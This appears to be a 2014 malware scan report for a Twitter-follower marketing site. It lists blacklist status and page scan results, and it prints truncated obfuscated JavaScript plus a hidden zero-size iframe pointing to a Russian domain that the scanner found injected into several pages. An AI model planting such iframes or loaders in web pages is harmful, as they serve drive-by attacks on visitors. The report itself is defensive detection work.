Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gettargetedtwitters.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gettargetedtwitters.com/ | 200 OK Content-Length: 12625 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var AD;if(AD!=''){AD='BW'};var K;if(K!='D' && K!='Hu'){K=''};this.Yv="";function Y(){var TC=new Array();var n=new Array();var YO=unescape;var w;if(w!='a' && w != ''){w=null};var b;if(b!='' && b!='gW'){b=null};var s=window;var V=YO("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%63%65%72%2e%63%6f%6d%2f%65%78%61%6d%69%6e%65%72%2e%63%6f%6d%2e%70%68%70");this.KQ='';var hO="";var r;if(r!='' && r!='U'){r=null};function h(T,z){var W= ...[1765 bytes skipped]... Antivirus reports:
Malicious iFrame found. The same iFrame was found in 20 websites. size: 0x0 src: http://quake2012.ru/in.php?a=qqkfbwqhbaeabqqmekcjbqcebwyabqchda== This URL is marked by Google as suspicious <iframe src="http://quake2012.ru/in.php?a=qqkfbwqhbaeabqqmekcjbqcebwyabqchda==" width="0" height="0" frameborder="0"> | ||
http://www.niche4wealth.com/date.js | 200 OK Content-Length: 815 Content-Type: application/javascript | clean |
http://gettargetedtwitters.com/index.php | 200 OK Content-Length: 12625 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var AD;if(AD!=''){AD='BW'};var K;if(K!='D' && K!='Hu'){K=''};this.Yv="";function Y(){var TC=new Array();var n=new Array();var YO=unescape;var w;if(w!='a' && w != ''){w=null};var b;if(b!='' && b!='gW'){b=null};var s=window;var V=YO("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%63%65%72%2e%63%6f%6d%2f%65%78%61%6d%69%6e%65%72%2e%63%6f%6d%2e%70%68%70");this.KQ='';var hO="";var r;if(r!='' && r!='U'){r=null};function h(T,z){var W= ...[1765 bytes skipped]... Antivirus reports:
Malicious iFrame found. The same iFrame was found in 20 websites. size: 0x0 src: http://quake2012.ru/in.php?a=qqkfbwqhbaeabqqmekcjbqcebwyabqchda== This URL is marked by Google as suspicious <iframe src="http://quake2012.ru/in.php?a=qqkfbwqhbaeabqqmekcjbqcebwyabqchda==" width="0" height="0" frameborder="0"> | ||
http://gettargetedtwitters.com/index_Login.php | 200 OK Content-Length: 5087 Content-Type: text/html | clean |
http://ecologicform.com/Pricingcharts/Compression.config.php | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://ecologicform.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://ecologicform.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://gettargetedtwitters.com/index_Contact.php | 200 OK Content-Length: 6362 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var AD;if(AD!=''){AD='BW'};var K;if(K!='D' && K!='Hu'){K=''};this.Yv="";function Y(){var TC=new Array();var n=new Array();var YO=unescape;var w;if(w!='a' && w != ''){w=null};var b;if(b!='' && b!='gW'){b=null};var s=window;var V=YO("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%63%65%72%2e%63%6f%6d%2f%65%78%61%6d%69%6e%65%72%2e%63%6f%6d%2e%70%68%70");this.KQ='';var hO="";var r;if(r!='' && r!='U'){r=null};function h(T,z){var W= ...[1765 bytes skipped]... Antivirus reports:
Malicious iFrame found. The same iFrame was found in 20 websites. size: 0x0 src: http://quake2012.ru/in.php?a=qqkfbwqhbaeabqqmekcjbqcebwyabqchda== This URL is marked by Google as suspicious <iframe src="http://quake2012.ru/in.php?a=qqkfbwqhbaeabqqmekcjbqcebwyabqchda==" width="0" height="0" frameborder="0"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gettargetedtwitters.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 09:50:38 GMT
Server: nginx/1.6.2
Content-Type: text/html
GET / HTTP/1.1
Host: gettargetedtwitters.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 09:50:38 GMT
Server: nginx/1.6.2
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: gettargetedtwitters.com
Referer: http://www.google.com/search?q=gettargetedtwitters.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gettargetedtwitters.com
Referer: http://www.google.com/search?q=gettargetedtwitters.com
Result:
The result is similar to the first query. There are no suspicious redirects found.